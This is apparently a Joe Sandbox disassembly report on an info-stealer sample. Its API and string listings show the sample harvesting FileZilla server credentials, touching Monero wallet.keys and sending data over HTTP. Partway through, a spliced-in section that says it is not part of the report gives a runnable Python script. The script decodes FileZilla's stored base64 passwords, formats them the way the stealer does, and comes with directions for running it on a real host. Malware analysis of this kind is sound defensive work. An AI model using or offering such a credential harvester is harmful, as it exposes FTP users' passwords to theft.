                              • Instruction ID: 87c479a3311870d95142325f8df8b5f3fc20f36e829835bf75681ad240cf9d62
                              • Opcode Fuzzy Hash: 6b001ea54cd719db48b7be768c4efd3ecd59760b42afe81b31ef386eea2b0b65
                              • Instruction Fuzzy Hash: FB71F8F3A082149FE3146F29DC8577ABBE5EB94320F1A493CDBD497784EA3948058686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cef32beab6c5bebf87c41f6914b4b5832566670c39cb6d3cae9819d1aad24ea3
                              • Instruction ID: d7d7a114e2b0249279b9c4723c34443d332b7e54ec86946b34afd0923312a80c
                              • Opcode Fuzzy Hash: cef32beab6c5bebf87c41f6914b4b5832566670c39cb6d3cae9819d1aad24ea3
                              • Instruction Fuzzy Hash: 846129F390C2109FE304AE2DEC8576AB7E5EF94310F1A853DEBC483784EA7958048697
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f67a187568dfbe88ef8996c555226bb4e5cc232a3491fd37679a2c58f42bdb8e
                              • Instruction ID: 5ba328d8763884978de6c34de1d3af0ca517816c46a67279602aaabd5b7373ac
                              • Opcode Fuzzy Hash: f67a187568dfbe88ef8996c555226bb4e5cc232a3491fd37679a2c58f42bdb8e
                              • Instruction Fuzzy Hash: 244129F3D042004BF754A97CEC8676ABAD5DB94320F1A4A3CABD8C37C4F93D99018686
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c4c7e87757364f1fa3e21e0bb06e7428b56f2cea60255eb586b5aa402dec3028
                              • Instruction ID: 536381f53eeea92215545ef1aba8007b767de3f77ddbdeffc02680673027eb88
                              • Opcode Fuzzy Hash: c4c7e87757364f1fa3e21e0bb06e7428b56f2cea60255eb586b5aa402dec3028
                              • Instruction Fuzzy Hash: 0D418AF3A182089FF3041D28EC8573BB7DAE790760F2B863DAA85C3744D93A58054255
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70d34bbcefae9928e8dfd8a846bde45139e6883c9236fe3db2520fb0ebe4ce77
                              • Instruction ID: 21e14dfa8b92de52e6ba00140231df573445ddc75494732dba2a9eaf356a3591
                              • Opcode Fuzzy Hash: 70d34bbcefae9928e8dfd8a846bde45139e6883c9236fe3db2520fb0ebe4ce77
                              • Instruction Fuzzy Hash: A33183B390D2209FE705BE29D8915AAFBE5EF98360F16492DE9D4C3610D6315840CBD7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                               • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                                • Part of subcall function 00FF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                                • Part of subcall function 00FF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                                • Part of subcall function 00FF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                                • Part of subcall function 00FF99C0: LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                                • Part of subcall function 00FF99C0: CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,01010DBA,01010DB7,01010DB6,01010DB3), ref: 01000362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 01000369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 01000385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 010003CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 010003DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 01000419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 01000463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 01000532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 01000562
                              • lstrcat.KERNEL32(?,profile: null), ref: 01000571
                              • lstrcat.KERNEL32(?,url: ), ref: 01000580
                              • lstrcat.KERNEL32(?,00000000), ref: 01000593
                              • lstrcat.KERNEL32(?,01011678), ref: 010005A2
                              • lstrcat.KERNEL32(?,00000000), ref: 010005B5
                              • lstrcat.KERNEL32(?,0101167C), ref: 010005C4
                              • lstrcat.KERNEL32(?,login: ), ref: 010005D3
                              • lstrcat.KERNEL32(?,00000000), ref: 010005E6
                              • lstrcat.KERNEL32(?,01011688), ref: 010005F5
                              • lstrcat.KERNEL32(?,password: ), ref: 01000604
                              • lstrcat.KERNEL32(?,00000000), ref: 01000617
                              • lstrcat.KERNEL32(?,01011698), ref: 01000626
                              • lstrcat.KERNEL32(?,0101169C), ref: 01000635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01010DB2), ref: 0100068E
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a1af0ee0b477343c71193fc3b3dd6a1fc8f4d0a843bbc264881d530d89b6aa1a
                              • Instruction ID: 4ad957c2f5b71fd8cd2e95bedb4a706fa56568a72d823742de67548349ed95e3
                              • Opcode Fuzzy Hash: a1af0ee0b477343c71193fc3b3dd6a1fc8f4d0a843bbc264881d530d89b6aa1a
                              • Instruction Fuzzy Hash: CBD10071A002099BEB15EBF4DD99EEE7778BF68300F544518F182A70C8DF75AA49CB60
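                               Added example, not part of the Joe Sandbox report and not code from the sample: the API and string lists above show this routine reading \AppData\Roaming\FileZilla\recentservers.xml, locating <Host>, <Port>, <User> and <Pass encoding="base64"> with StrStrA, and concatenating a record that starts with "browser: FileZilla" and "profile: null" followed by "url: ", "login: " and "password: ". The Python below parses the same file and emits the same record, so a responder triaging an infected host can see which stored FTP credentials the stealer would have taken. The sample XML is constructed; the separators between fields (a colon between host and port, a newline after each line) are assumed, because those lstrcat arguments appear in the report only as unresolved pointers (01011678 and so on).

```python
r"""Added example, not part of the Joe Sandbox report or of the sample's code.

Reproduces what the routine at 01000362..0100068E harvests: the report shows it
reading \AppData\Roaming\FileZilla\recentservers.xml, locating <Host>, <Port>,
<User> and <Pass encoding="base64"> with StrStrA, and building a record that
starts "browser: FileZilla" / "profile: null" followed by "url: ", "login: "
and "password: ". Running this against the file from an infected host shows a
responder which stored FTP credentials were exposed.
"""
from __future__ import annotations

import base64
import xml.etree.ElementTree as ET

# Constructed sample input (not taken from the analysed machine). The base64
# value decodes to "SuperSecret!"; the second entry has no stored password.
SAMPLE_RECENTSERVERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>alice</User>
      <Pass encoding="base64">U3VwZXJTZWNyZXQh</Pass>
      <Logontype>1</Logontype>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <Type>0</Type>
      <User>bob</User>
      <Logontype>0</Logontype>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def parse_filezilla_recentservers(xml_text: str) -> list[dict]:
    """Return one dict per <Server> with host, port, user and decoded password.

    FileZilla stores the password base64-encoded, which is exactly what the
    <Pass encoding="base64"> marker the stealer searches for indicates. Entries
    without a <Pass> element (anonymous or key-based logon) get password None.
    """
    root = ET.fromstring(xml_text.encode("utf-8"))
    records = []
    for server in root.iter("Server"):
        password = None
        pass_el = server.find("Pass")
        if pass_el is not None and pass_el.text:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", "replace")
            else:
                # Very old FileZilla builds wrote the password in clear text.
                password = pass_el.text
        records.append({
            "host": server.findtext("Host", default=""),
            "port": server.findtext("Port", default=""),
            "user": server.findtext("User", default=""),
            "password": password,
        })
    return records


def format_stealer_record(rec: dict) -> str:
    """Lay the fields out in the order of the lstrcat sequence in the report.

    The labels are the report's literal strings. The separators (a colon
    between host and port, a newline after each line) are an assumption: those
    lstrcat arguments appear in the report only as unresolved pointers.
    """
    password = rec["password"] if rec["password"] is not None else ""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {password}\n"
    )


def exposed_credentials(xml_text: str) -> list[str]:
    """Formatted records for every server that has a stored password.

    Only these entries hand the attacker a usable credential; the filtering is
    a choice of this example, not behaviour read from the report.
    """
    return [
        format_stealer_record(rec)
        for rec in parse_filezilla_recentservers(xml_text)
        if rec["password"]
    ]


if __name__ == "__main__":
    for record in exposed_credentials(SAMPLE_RECENTSERVERS_XML):
        print(record)
```

                               To run it on a real host, read %APPDATA%\FileZilla\recentservers.xml into a string in place of the constructed sample. FileZilla's sitemanager.xml uses the same <Server> layout, so the parser handles it as well, although the function listed above only references recentservers.xml.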
                              APIs
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                                • Part of subcall function 00FF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FF4839
                                • Part of subcall function 00FF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FF4849
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FF59F8
                              • StrCmpCA.SHLWAPI(?,0198FB08), ref: 00FF5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FF5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0198FAC8,00000000,?,0198ED48,00000000,?,01011A1C), ref: 00FF5E71
                              • lstrlen.KERNEL32(00000000), ref: 00FF5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00FF5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00FF5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FF5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00FF5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FF5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FF5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FBD
                              • HttpOpenRequestA.WININET(00000000,0198FA28,?,0198F400,00000000,00000000,00400100,00000000), ref: 00FF5BF8
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • InternetCloseHandle.WININET(00000000), ref: 00FF5FC7
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 46895bbed539c78e065566e75f94a74a4f0e3328b3661e6daebcd67f903f43b9
                              • Instruction ID: 92b869e9d82ea06cc1af9ee2b25cf9c01a1ec4eedd05a07d30b37864e87c5bc7
                              • Opcode Fuzzy Hash: 46895bbed539c78e065566e75f94a74a4f0e3328b3661e6daebcd67f903f43b9
                              • Instruction Fuzzy Hash: 8D12C271A20219EBEB16EBA0DC94FEE7378BF24700F5041A9A146A70D0DF746B49CF64
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 01008B60: GetSystemTime.KERNEL32(01010E1A,0198E8C8,010105AE,?,?,00FF13F9,?,0000001A,01010E1A,00000000,?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 01008B86
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FFCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FFD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FFD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD208
                              • lstrcat.KERNEL32(?,01011478), ref: 00FFD217
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD22A
                              • lstrcat.KERNEL32(?,0101147C), ref: 00FFD239
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD24C
                              • lstrcat.KERNEL32(?,01011480), ref: 00FFD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD26E
                              • lstrcat.KERNEL32(?,01011484), ref: 00FFD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD290
                              • lstrcat.KERNEL32(?,01011488), ref: 00FFD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD2B2
                              • lstrcat.KERNEL32(?,0101148C), ref: 00FFD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00FFD2D4
                              • lstrcat.KERNEL32(?,01011490), ref: 00FFD2E3
                                • Part of subcall function 0100A820: lstrlen.KERNEL32(00FF4F05,?,?,00FF4F05,01010DDE), ref: 0100A82B
                                • Part of subcall function 0100A820: lstrcpy.KERNEL32(01010DDE,00000000), ref: 0100A885
                              • lstrlen.KERNEL32(?), ref: 00FFD32A
                              • lstrlen.KERNEL32(?), ref: 00FFD339
                                • Part of subcall function 0100AA70: StrCmpCA.SHLWAPI(019889D0,00FFA7A7,?,00FFA7A7,019889D0), ref: 0100AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00FFD3B4
                               Memory Dump Source
                               • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 72dfe79bc355a23b3c0716fe251e473fce8a1546dffd47908a9883294e83cb48
                              • Instruction ID: c58c47c8752fffa73e79b2c98eec991a78283446cce3667d9672ed306056bc09
                              • Opcode Fuzzy Hash: 72dfe79bc355a23b3c0716fe251e473fce8a1546dffd47908a9883294e83cb48
                              • Instruction Fuzzy Hash: 37E13471A10209EBDB15EBA0DD99EEE7378BF64200F104168E187A70D4DF35AF49DB61
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0198D8D0,00000000,?,0101144C,00000000,?,?), ref: 00FFCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00FFCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00FFCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FFCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00FFCAD9
                              • StrStrA.SHLWAPI(?,0198D9D8,01010B52), ref: 00FFCAF7
                              • StrStrA.SHLWAPI(00000000,0198D918), ref: 00FFCB1E
                              • StrStrA.SHLWAPI(?,0198E2B0,00000000,?,01011458,00000000,?,00000000,00000000,?,01988990,00000000,?,01011454,00000000,?), ref: 00FFCCA2
                              • StrStrA.SHLWAPI(00000000,0198E110), ref: 00FFCCB9
                                • Part of subcall function 00FFC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FFC871
                                • Part of subcall function 00FFC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FFC87C
                              • StrStrA.SHLWAPI(?,0198E110,00000000,?,0101145C,00000000,?,00000000,019888C0), ref: 00FFCD5A
                              • StrStrA.SHLWAPI(00000000,01988C10), ref: 00FFCD71
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B46), ref: 00FFC943
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B47), ref: 00FFC957
                                • Part of subcall function 00FFC820: lstrcat.KERNEL32(?,01010B4E), ref: 00FFC978
                              • lstrlen.KERNEL32(00000000), ref: 00FFCE44
                              • CloseHandle.KERNEL32(00000000), ref: 00FFCE9C
                              Strings
                               Memory Dump Source
                               • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
